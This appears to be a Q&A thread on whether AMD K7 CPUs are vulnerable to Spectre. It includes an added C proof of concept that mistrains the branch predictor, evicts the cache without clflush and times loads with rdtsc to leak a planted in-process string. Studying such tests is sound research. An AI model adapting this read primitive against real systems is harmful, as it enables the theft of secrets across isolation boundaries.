3

Considering AMD K7-family (Athlon XP...) 32-bit-only processors, have there been any published exploits (viz. "Spectre"-type attacks) or indications that such would be even remotely possible in practice? While in theory, I understand, similar effects on the cache contents from (mis)speculated instructions are possible on those older processors to those that have been demonstrated on Intel/AMD64, in practice I wonder whether there are the means for exploiting them on the platform under consideration. Specifically, lacking SSE2 and higher "goodies" (clflush...), is it nonetheless possible, using the comparatively reduced instruction set, to devise a working PoC "reading" the leaked bits, at user privilege, and then at a significant enough bit rate for such an attack to be a serious threat? I'd appreciate seeing example code if so...

NimbUs

2 Answers

3

Published exploits? Not that I'm aware of.

Indications that it would be possible? Yes. The K7 family, like its Intel counterparts, is an out-of-order design with a branch predictor. Those are the two critical parts for performing a Spectre attack. You don't need a cache-flush instruction to perform the attack, since you can get the same effect just by reading an area of memory you know the attack won't access. In fact, this is exactly how the JavaScript proof-of-concept clears the cache, since the JavaScript JIT doesn't give access to clflush.

Mark
  • OK so IIUC a basic test (not an OS exploit) for CPU susceptibility to a Spectre variant is as simple as: 1) read in enough contiguous memory to fill the data cache (thus implicitly flushing previously cached addresses); 2) speculatively access some test location; 3) check (time) an ordinary read from said location. // Could even be done in (big) real mode! – NimbUs Feb 11 '18 at 11:46
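As an added example (not code from the question, the answers, or any published PoC), here is one way to turn the three steps in the comment above into a Spectre v1 test in C that uses only pre-SSE2 x86 instructions: eviction by reading through a large buffer instead of clflush, a branch-predictor mistraining loop, and an rdtsc timer serialised with cpuid rather than lfence. The array names follow the public Spectre PoC convention; the 8 MiB eviction size, the 4096-byte probe stride, the round counts, the secret string and all helper names are assumptions made for this example. One line in the loop architecturally touches the secret's cache line before each victim call; it stands in for a real victim keeping its own data hot, since the eviction sweep otherwise pushes that line out too.

```c
/* Spectre v1 read primitive with only baseline x86 instructions: loads, cpuid, rdtsc.
 * Step 1 evicts by streaming a big buffer (no clflush), step 2 calls the mistrained
 * victim, step 3 times the probe lines. Build: gcc -O2 spectre_k7.c (-m32 for a K7). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#define CACHE_LINE   64
#define EVICT_BYTES  (8u << 20)  /* 8 MiB, assumed > 4x any K7 L2 (512 KiB max) */
#define PROBE_STRIDE 4096        /* one page per byte value, so no two share a line */
#define TRAIN_CALLS  5           /* in-bounds calls before each out-of-bounds call */
#define ROUNDS       30          /* votes per leaked byte */

/* Victim side (same process, as in the public PoCs). array1_size has external linkage
 * so the compiler cannot fold the bounds check into a constant. */
uint8_t array1_size = 16;
uint8_t array1[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static uint8_t probe[256 * PROBE_STRIDE];   /* side-channel array ("array2") */
static volatile uint8_t sink;
const char *secret = "The Magic Words are Squeamish Ossifrage."; /* constructed secret */

__attribute__((noinline)) void victim_function(size_t x)
{   /* With array1_size uncached, the predicted-taken branch runs the body speculatively
     * for an out-of-bounds x and pulls one probe line into the cache. */
    if (x < array1_size)
        sink = probe[array1[x] * PROBE_STRIDE];
}

/* Attacker side */
static uint8_t evict_buf[EVICT_BYTES];
static void setup(void)
{
    memset(probe, 1, sizeof probe);            /* map pages now, not during speculation */
    memset(evict_buf, 1, sizeof evict_buf);
}
/* clflush substitute: touch one byte per line of a buffer larger than every cache level,
 * pushing array1_size and all 256 probe lines out. Returns lines touched (bytes are 1). */
static size_t evict_cache(void)
{
    size_t sum = 0;
    for (size_t i = 0; i < EVICT_BYTES; i += CACHE_LINE)
        sum += evict_buf[i];
    return sum;
}
/* Serialised timestamp: cpuid drains the pipeline before rdtsc; its eax input makes it
 * wait for the timed load. Both exist on a K7, unlike lfence/rdtscp. */
static inline uint64_t cycles(uint32_t dep)
{
#if defined(__i386__) || defined(__x86_64__)
    uint32_t lo, hi;
    __asm__ volatile("cpuid\n\trdtsc" : "=a"(lo), "=d"(hi) : "a"(dep) : "ebx", "ecx", "memory");
    return ((uint64_t)hi << 32) | lo;
#else
    (void)dep; return (uint64_t)clock();       /* non-x86 fallback: compiles, too coarse to leak */
#endif
}
static uint64_t time_load(const volatile uint8_t *p)
{
    uint64_t t0 = cycles(0); uint32_t v = *p; return cycles(v) - t0;
}
/* Branch-free index choice: in-bounds for the TRAIN_CALLS training calls, out-of-bounds on
 * the last. A data-dependent branch here would itself get trained. Arithmetic >> assumed. */
static size_t select_index(unsigned j, size_t training_x, size_t malicious_x)
{
    int d = (int)TRAIN_CALLS - (int)j;                                   /* 0 only on the attack call */
    size_t mask = (size_t)(intptr_t)((d - 1) >> (sizeof(int) * 8 - 1)); /* all ones iff d == 0 */
    return training_x ^ (mask & (training_x ^ malicious_x));
}
/* Recover array1[malicious_x] (an address far outside array1) by majority vote. */
static uint8_t leak_byte(size_t malicious_x)
{
    unsigned votes[256] = {0};
    size_t training_x = malicious_x % array1_size;                       /* any legal index */
    for (unsigned r = 0; r < ROUNDS; r++) {
        for (unsigned j = 0; j <= TRAIN_CALLS; j++) {
            evict_cache();                                                /* array1_size and probe[] cold */
            sink = *(volatile const uint8_t *)(array1 + malicious_x);     /* stands in for the victim using its data */
            victim_function(select_index(j, training_x, malicious_x));
        }
        uint64_t best = UINT64_MAX; unsigned guess = 0;   /* scrambled probe order; fastest line wins */
        for (unsigned i = 0; i < 256; i++) {
            unsigned mix_i = (i * 167 + 13) & 255;
            uint64_t t = time_load(&probe[mix_i * PROBE_STRIDE]);
            if (t < best) { best = t; guess = mix_i; }
        }
        votes[guess]++;
    }
    unsigned best_b = 0;
    for (unsigned b = 1; b < 256; b++) if (votes[b] > votes[best_b]) best_b = b;
    return (uint8_t)best_b;
}
int main(void)
{
    setup();
    size_t malicious_x = (size_t)(secret - (const char *)array1);   /* offset from array1 to the secret */
    for (size_t i = 0, n = strlen(secret); i < n; i++) {
        uint8_t b = leak_byte(malicious_x + i);
        putchar((b >= 32 && b < 127) ? b : '?'); fflush(stdout);
    }
    putchar('\n'); return 0;
}
```

On a susceptible CPU the program prints the secret string one byte at a time; on a CPU that does not speculate far enough, or with the eviction buffer too small for its caches, the output is noise. Each leaked byte costs ROUNDS × (TRAIN_CALLS + 1) sweeps of the eviction buffer, which is the price of not having clflush: a conflict-set eviction of just the array1_size line would be much faster but needs the exact cache geometry of the target. Whether a K7 actually leaks under this test is precisely what the question asks and is not something this example settles.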
0

It all really depends on whether the out-of-order execution abilities of the CPU are advanced enough for Spectre to work. I haven't found any tests on such old hardware so far. For older PowerPC CPUs, it was determined that they do not, according to an article on the TenFourFox blog.

Alex Cannon
  • The K7 is AMD's counterpart to the Pentium III. Both are fully out-of-order designs, and the PIII is certainly vulnerable to Spectre, so I find it highly improbable that the K7 isn't. – Mark Jan 20 '18 at 04:37
  • Is there a published source somewhere that states that these older out-of-order CPUs are vulnerable to Spectre? Since Intel is much more popular than AMD, and all Spectre-vulnerable Intel CPUs are also vulnerable to Meltdown, it seems that little attention has been paid to how these older CPUs are affected by Spectre. – Alex Cannon Feb 09 '18 at 02:16